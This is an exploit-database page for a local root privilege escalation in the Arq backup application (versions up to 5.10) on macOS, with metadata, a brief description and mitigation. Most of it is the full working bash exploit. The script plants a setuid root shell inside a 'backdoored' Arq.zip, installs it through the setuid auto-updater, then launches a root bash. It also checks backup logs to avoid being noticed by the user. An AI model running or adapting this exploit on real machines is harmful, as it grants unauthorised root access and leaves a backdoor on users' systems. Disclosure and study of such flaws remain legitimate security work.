header-logo
Suggest Exploit
vendor:
Arq
by:
m4rkw
7.8
CVSS
HIGH
Privilege Escalation
269
CWE
Product Name: Arq
Affected Version From: Arq <= 5.10
Affected Version To: Arq <= 5.10
Patch Exists: YES
Related CWE: N/A
CPE: a:arqbackup:arq
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: macOS
2020

Arq <= 5.10 local root privilege escalation exploit

This exploit is used to gain root privileges on Arq <= 5.10. It works by exploiting a vulnerability in the Arq Agent application, which is used to perform auto-updates. The exploit involves copying the Arq application to a user's home directory, compiling a payload, backing up the original files, and then installing the payload. Once the payload is installed, the exploit is triggered by opening the Arq Agent application, which will then execute the payload and gain root privileges.

Mitigation:

Disable auto-updates for Arq and ensure that the application is up to date.
Source

Exploit-DB raw data:

#!/bin/bash

#################################################################
###### Arq <= 5.10 local root privilege escalation exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html              ######
#################################################################

app="/Applications/Arq.app"
res="$app/Contents/Resources"
lires="$app/Contents/Library/LoginItems/Arq Agent.app/Contents/Resources"

vuln=`ls -la "$lires/arq_updater" |grep '\-rws' |grep root`

if [ "$vuln" == "" ] ; then
  echo "Not vulnerable - auto-updates not enabled."
  exit 1
fi

if [ "$1" != "-f" ] ; then
  latest_logfile="`ls -1t ~/Library/Logs/Arq\ Agent/ |head -n1`"
  status_line="`egrep -i 'backup session.*?(ended|started)' \
    \"$HOME/Library/Logs/Arq Agent/$latest_logfile\" |tail -n1 |grep -i started`"

  if [ "$status_line" != "" ] ; then
    echo -n "WARNING: backup in progress, the user will very "
    echo "likely notice if we exploit now!"
    echo "use -f to override."
    exit 1
  fi
fi

owd="`pwd`"

if [ -e ~/.arq_510_privesc_exp ] ; then
  rm -rf ~/.arq_510_privesc_exp
fi

mkdir ~/.arq_510_privesc_exp
cd ~/.arq_510_privesc_exp

echo "copying application..."

cp -R /Applications/Arq.app .

echo "compiling payloads..."

cat > payload.sh <<EOF
#!/bin/bash
rm -rf $HOME/.arq_510_privesc_exp
while :
do
  pid=\`ps auxwww |grep '$app/Contents/MacOS/Arq' |grep -v grep |xargs \
    |cut -d ' ' -f2\`
  if [ "\$pid" != "" ] ; then
    kill -9 \$pid
    open $app/Contents/Library/LoginItems/Arq\ Agent.app
    exit 0
  fi
done
EOF
chmod 755 payload.sh

au_relative=`echo "$lires/standardrestorer" |sed 's/^\/Applications\///'`

cat > shell.c <<EOF
#include <unistd.h>
#include <string.h>
int main(int ac, char *av[])
{
  if (ac > 1 && strcmp(av[1], "boom") == 0) {
    setuid(0);
    setgid(0);
    execl(
      "/bin/bash","bash","-c","mv -f $res/standardrestorer.orig $res/standardr"
      "estorer;chmod 4755 $res/standardrestorer;$HOME/.arq_510_privesc_exp/pay"
      "load.sh;/bin/bash", NULL
    );
  }
  return 0;
}
EOF
mv Arq.app/Contents/Resources/standardrestorer \
  Arq.app/Contents/Resources/standardrestorer.orig
gcc -o Arq.app/Contents/Resources/standardrestorer shell.c
rm -f shell.c

payload_size=`stat Arq.app/Contents/Resources/standardrestorer |cut -d ' ' -f8`
GID=`id |sed 's/^.*gid=//' |cut -d '(' -f1`
cwd=`pwd`

echo "creating backdoored Arq.zip..."
zip -1r Arq.zip Arq.app/ 1>/dev/null 2>/dev/null
rm -rf Arq.app/

echo "executing upgrade..."

"$lires/arq_updater" installupdate file://$cwd/Arq.zip $UID $GID YES \
  1>/dev/null 2>/dev/null

echo "waiting..."
while :
do
  ac_size=`stat $res/standardrestorer 2>/dev/null |cut -d ' ' -f8`
  x=`ls -la $res/standardrestorer |grep -- '-rwsr-xr-x' |grep root`

  if [ "$ac_size" == "$payload_size" -a "$x" != "" ] ; then
    cd "$owd"
    $res/standardrestorer boom
    exit 0
  fi
  sleep 0.2
done

Navigation

Suggest Exploit

Services By CQR